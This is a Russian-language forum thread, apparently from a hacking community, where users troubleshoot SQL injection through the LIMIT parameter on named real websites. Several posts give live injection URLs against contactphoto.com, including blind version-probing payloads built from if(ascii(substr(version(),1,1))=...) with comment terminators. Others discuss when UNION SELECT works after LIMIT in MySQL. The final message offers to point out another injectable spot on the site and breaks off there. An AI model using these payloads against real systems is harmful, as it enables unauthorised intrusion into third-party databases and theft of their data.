; если не ошибаюсь означает конец запроса, проправьте если ошибаюсь

в MySQL использовать UNION после ORDER нельзя:
SELECT 1 ORDER BY 1 LIMIT 1 UNION SELECT 1
->
Incorrect usage of UNION and ORDER BY
но просто с LIMIT можно:
SELECT 1 LIMIT 1 UNION SELECT 1;
->
+---+
| 1 |
+---+
| 1 |
+---+
1 row in set (0.00 sec)

2prescott и почему же тогда в данном случае не работает?

Я думаю что в случае с formz.ru стоит другой сервер базы данных, поэтому и прошу помощи ачатовцев. С распространенными БД я сам могу в большинстве случаев справиться, тут просто какая то некандиция...

Например такой запрос прокатывает, следовательно ; для этой БД означает конец запроса, ошибки ведь не возникает, заметь!

А если вместо точки с запятой поставить например дефис, вылетает критическая ошибка.

2prescott

почему тут не получается? вроде все как ты описывал, помоги разобраться

http://www.contactphoto.com/archive.php?search=&limit=1

вроде тогда один из двух вариантов должен был сработать

http://www.contactphoto.com/archive.php?search=&limit=1,2*if(ascii(substr(vers ion(),1,1))=34,1,2)/*

или

http://www.contactphoto.com/archive.php?search=&limit=1,2*if(ascii(substr(vers ion(),1,1))=35,1,2)/*

Потомучто это не mysql и не mssql, ибо запрос http://www.contactphoto.com/archive.php?search=&limit=1,2-- ругается на --, что для них должно однозначно трактоваться как комментарий.

UPD: был не прав, ошибка пишет что это действительно mysql...

@prescott
подзапросы после лимита или в его аргументе нельзя использовать, можно только добавить UNION SELECT и то при условии, что перед лимитом нет ORDER BY
не будет так работать, даже такой запрос возвращает ошибку:
select 1 order by 1 limit 1,5*1;

это не mssql

тема закрыта, если есть order by то можно не расчитывать на иньекцию.

кстати, если тебе всетаки нужен тот сайт, то инъекция есть тут, да и крутится легко: